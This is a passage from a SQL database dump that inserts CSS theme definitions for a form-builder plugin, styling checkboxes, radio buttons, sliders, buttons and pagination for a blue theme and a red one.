#678B94;\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	border-color: #678B94;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/04/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.radio-div label {\r\ncursor: pointer;\r\n-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: "";\r\nposition: absolute;\r\nwidth: 10px;\r\nheight: 10px;\r\nbackground: #63929E ;\r\nbackground: -moz-linear-gradient(bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbackground: -webkit-linear-gradient(bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbackground: -o-linear-gradient(bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbackground: -ms-linear-gradient(bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbackground: linear-gradient(to bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(214, 214, 214) inset;\r\nborder-radius: 7px;\r\ntop: 1px;\r\nleft: 1px;\r\nborder: 1px solid #678B94;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 20px 0px 20px;\r\n	font-weight: bold;\r\n	background-color: #88B4BD;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #678B94;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-left: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #678B94;\r\n	vertical-align: middle;\r\n	font-family: ArTarumianHandes;\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\n	background-color: #88B4BD;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 20px;\r\n	height: 23px;\r\n	background-color: #678B94;\r\n	position: relative;\r\n	left: -14px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n	-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-o-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}', 0);
INSERT INTO `cyb_formmaker_themes` (`id`, `title`, `css`, `default`) VALUES
(15, 'Theme 04 red', '.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #CEE4E4;\r\nmargin-bottom: 10px;\r\ncolor: #CEE4E4;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 15px;\r\n	height: 15px;\r\n	top: -5px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n@font-face {\r\n	font-family: ArTarumianHandes;\r\n	src: url([SITE_ROOT]/css/HANDES.ttf);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #EDE5DA;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 20px;\r\n	width: 22px;\r\n	background: url([SITE_ROOT]/images/04/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 45px;\r\n	height: 44px;\r\n	background: url([SITE_ROOT]/images/04/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #424242;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 35px;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-weight: 400;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n}\r\ndiv.wdform-page-button:hover {\r\ncolor: #fff;\r\nborder: 1px solid #C09F97;\r\nbackground: #86A0A7;\r\nbackground: -moz-linear-gradient(bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbackground: -webkit-linear-gradient(bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbackground: -o-linear-gradient(bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbackground: -ms-linear-gradient(bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbackground: linear-gradient(to bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-submit {\r\n	color: #767676 !important;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 32px;\r\n	padding: 0px 20px 5px;\r\n	vertical-align: middle;\r\n	font-weight: 400 !important;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n	font-family: Segoe UI;\r\nbackground:transparent;\r\n}\r\n.button-submit:hover {\r\ncolor: #fff !important;\r\nborder: 1px solid #C09F97;\r\nbackground: #86A0A7;\r\nbackground: -moz-linear-gradient(bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbackground: -webkit-linear-gradient(bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbackground: -o-linear-gradient(bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbackground: -ms-linear-gradient(bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbackground: linear-gradient(to bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #E0D0CD;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\nmargin: 16px 10px 16px 0px;\r\ndisplay: inline-block;\r\nbackground: url([SITE_ROOT]/images/04/03/bg.png) no-repeat;\r\ntext-align: left;\r\nborder-radius: 0px;\r\nwidth: 300px;\r\npadding: 5px 10px;\r\ntext-align: center;\r\nfont-size: 18px;\r\n}\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ccc;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus {\r\n	border-color: #8A6B63;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus {\r\n	border-color: #8A6B63;\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	border-color: #8A6B63;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/04/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.radio-div label {\r\ncursor: pointer;\r\n-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: "";\r\nposition: absolute;\r\nwidth: 10px;\r\nheight: 10px;\r\nbackground: #B98476 ;\r\nbackground: -moz-linear-gradient(bottom, #CA9B8F 0%, #DBACA0 49%, #B98476 84%, #A38279 95%);\r\nbackground: -webkit-linear-gradient(bottom, #CA9B8F 0%, #DBACA0 49%, #B98476 84%, #A38279 95%);\r\nbackground: -o-linear-gradient(bottom, #CA9B8F 0%, #DBACA0 49%, #B98476 84%, #A38279 95%);\r\nbackground: -ms-linear-gradient(bottom, #CA9B8F 0%, #DBACA0 49%, #B98476 84%, #A38279 95%);\r\nbackground: linear-gradient(to bottom, #CA9B8F 0%, #DBACA0 49%, #B98476 84%, #A38279 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(214, 214, 214) inset;\r\nborder-radius: 7px;\r\ntop: 1px;\r\nleft: 1px;\r\nborder: 1px solid #9B766D;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 20px 0px 20px;\r\n	font-weight: bold;\r\n	background-color: #CCAAA3;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #8A6B63;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-left: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #8A6B63;\r\n	vertical-align: middle;\r\n	font-family: ArTarumianHandes;\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\n	background-color: #CCAAA3;\r\n	text-align: left !important;\r\n	margin-bottom: 